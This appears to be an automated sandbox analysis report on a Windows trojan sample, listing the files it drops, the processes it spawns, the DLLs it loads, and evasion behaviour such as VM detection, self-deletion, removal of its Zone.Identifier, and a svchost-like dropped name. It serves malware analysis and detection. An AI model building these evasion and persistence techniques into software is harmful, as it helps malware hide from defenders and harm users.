Source: svchost015.exe.7.dr	Binary string: ol, por favorI&taliano, per favore&Portugues, por favorPo&lski..prj.xfcwhxvmem.pos.settings.zip.e01.dd001.ctr.txt.png.mem.memservice_workeredgetmp.tmpemlmsg.jpgheic.pdf;.ps;.tif;.jpg;.png;.gif;.bmp.htmlhtmlxmlsqlitesqlitedbregistryolk14messageedbsnssevtevtxplistbplist.xhdTesseractOCRExcireExcire ForensicsExcire.exe.\!imagespst,ost,edb,dbx,pfc,mbox,eml,emlx,mht,mim,msg,olk14msgsource,olk14message,olk14msgattach,olk15msgattach,olk15msgsource,olk15message,oft,mbs,tnefzip,zipx,7z,rar,tar,gz,tgz,bzip,bz2docx,xlsx,pptx,ppsx,odt,ods,odb,odg,odf,odp,key,numbers,pages,xps,oxps,opendoc,sxw,sxg,sxc,stc,sxm,sxi,sxd,std,stw,sxm,hwpxufdr,ova,gbp,odm,a2w,kmz,kpr,pxl2,bbb,idml,cdr,sbb,notebook,mmap,spd,cdmz,mwb,nbak,pez,artx,cmap,sh3d,dpp,snb,dbk,sps,spv,wpp,jnxthmx,war,otp,xap,dwfx,epub,btapp,u3p,nth,ibooks,3dxml,htmlz,cbz,ear,potx,ppam,xltx,xlsm,dotx,docm,dotx,vsdx,gadget,rbf,eftx,gg,ottjar,apk,ipa,appx,crx,cabzxp,ots,wmz,air,accft,vssx,ipcc,ipsw,xpi;.docx;.pptx;.xlsx;.vsdx;.vsdm;.odt;.odp;.ods.xls;.xlsx;.odsNEARNTNRFlexFilterANDOR (=offline)XWF_MTX_Alt Gr +Ctrl +Shift +Space +Ctrl+Alt +HeaderBlank line(s) found.Power down after x minutesFallback code page for plain text\\\\?\\\.\\\?\Volume{\Device\HarddiskVolume\Device\CdRom... .. FILEBAAD($MFT) WofCompressedDataIndex Record$EFS.PFILENTFS: EA(EA)NO NAME > 0x100x10 < 0x30Unable to terminate worker thread.X-Ways Decompressed [block hash values] [PhotoDNA] [FuzZyDoc]PhotoDNAFuzZyDoc_newTeamsMessagesDataTeamsMeetingsRecoverable Items\DeletionsTop of Personal FoldersSenRec.dirPasswords.txtSearch Terms.txtNewUsers.dirKeywordsLockSpecial Interest.sectorX-Ways SessionSleep(0) Frequency (0..100)non-existent sector debug info123123\|123\|1234\|12345\|123456\|1234567\|12345678\|123456789\|987654321\|abc123\|123abc\|121212\|000000\|666666\|qwerty\|password\|password1\|iloveyou\|monkey\|dragon\|qwertyuiop-------- * ---* ***nLicID& --> --> .journal.exclude.badblocksFile mode:Sequential #TOCBLOCKVMDBVBLKContainerFILETIMEZone.Identifier[ZoneTransfer]System Volume InformationNot enough space for metadata at offset<html>
Source: svchost015.exe.7.dr	Binary string: \Device\harddisk
Source: svchost015.exe.7.dr	Binary string: \Device\Floppy
Source: svchost015.exe.7.dr	Binary string: \Device\Floppy\Device\CDROM\Device\harddisk\partition0SQ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/4@9/3

Source: C:\Users\user\Desktop\e0OOofAl0S.exe

Code function: 0_2_005373AE CreateToolhelp32Snapshot,Module32First,

0_2_005373AE

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\busaafd

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\D931.tmp

Jump to behavior

Source: Yara match	File source: 8.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: e0OOofAl0S.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\D931.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D931.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: e0OOofAl0S.exe

Virustotal: Detection: 43%

Source: unknown	Process created: C:\Users\user\Desktop\e0OOofAl0S.exe "C:\Users\user\Desktop\e0OOofAl0S.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\busaafd C:\Users\user\AppData\Roaming\busaafd
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D931.exe C:\Users\user\AppData\Local\Temp\D931.exe
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D931.exe C:\Users\user\AppData\Local\Temp\D931.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\e0OOofAl0S.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Unpacked PE file: 0.2.e0OOofAl0S.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\busaafd	Unpacked PE file: 5.2.busaafd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00403245 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00403265 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401C0A pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_0040321E push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401C23 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401C27 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00403235 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401BF2 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401BF3 pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401BFE pushad ; iretd	0_2_00401C5C
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00403285 push eax; ret	0_2_00403276
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004010A9 push 1A43E3D0h; retf	0_2_004010B3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C5A pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C59 pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C65 pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C71 pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1110 push 1A43E3D0h; retf	0_2_004A111A
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C8A pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C8E pushad ; iretd	0_2_004A1CC3
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00538A01 push edx; retn 0063h	0_2_00538A0A
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_0053963B push 0CEB7905h; retf	0_2_00539640
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_005388D3 pushad ; iretd	0_2_00538982
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00539BC9 push eax; ret	0_2_00539BE0
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00537EF8 push 1A43E3D0h; retf	0_2_00537F02
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00539B91 push eax; ret	0_2_00539BE0
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00403245 push eax; ret	5_2_00403276
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00403265 push eax; ret	5_2_00403276
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401C0A pushad ; iretd	5_2_00401C5C
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_0040321E push eax; ret	5_2_00403276
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401C23 pushad ; iretd	5_2_00401C5C
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401C27 pushad ; iretd	5_2_00401C5C

Source: e0OOofAl0S.exe	Static PE information: section name: .text entropy: 7.427181340563761
Source: busaafd.1.dr	Static PE information: section name: .text entropy: 7.427181340563761

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D931.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D931.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\busaafd	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\busaafd

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\e0ooofal0s.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\busaafd:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\busaafd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\busaafd	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\busaafd	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: e0OOofAl0S.exe, 00000000.00000002.1778931179.000000000052E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 475	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2007	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 968	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2767	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 889	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 861	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7412	Thread sleep count: 475 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7420	Thread sleep count: 2007 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7420	Thread sleep time: -200700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7416	Thread sleep count: 968 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7416	Thread sleep time: -96800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7768	Thread sleep count: 334 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7776	Thread sleep count: 282 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7772	Thread sleep count: 277 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7420	Thread sleep count: 2767 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7420	Thread sleep time: -276700s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D931.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_0041A7A0 GetSystemTimes followed by cmp: cmp dword ptr [00421ecch], 0ah and CTI: jne 0041A9C4h		0_2_0041A7A0
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_0041A7A0 GetSystemTimes followed by cmp: cmp dword ptr [00421ecch], 0ah and CTI: jne 0041A9C4h		5_2_0041A7A0

Source: explorer.exe, 00000001.00000000.1767187574.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	Binary or memory string: ParallelsVirtualMachine
Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1769319687.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: explorer.exe, 00000001.00000000.1767187574.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1767187574.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: D931.exe, 00000007.00000000.2258731607.0000000000401000.00000020.00000001.01000000.00000006.sdmp, D931.exe.1.dr	Binary or memory string: QEMUU
Source: explorer.exe, 00000001.00000000.1766706025.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 00000001.00000000.1767187574.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
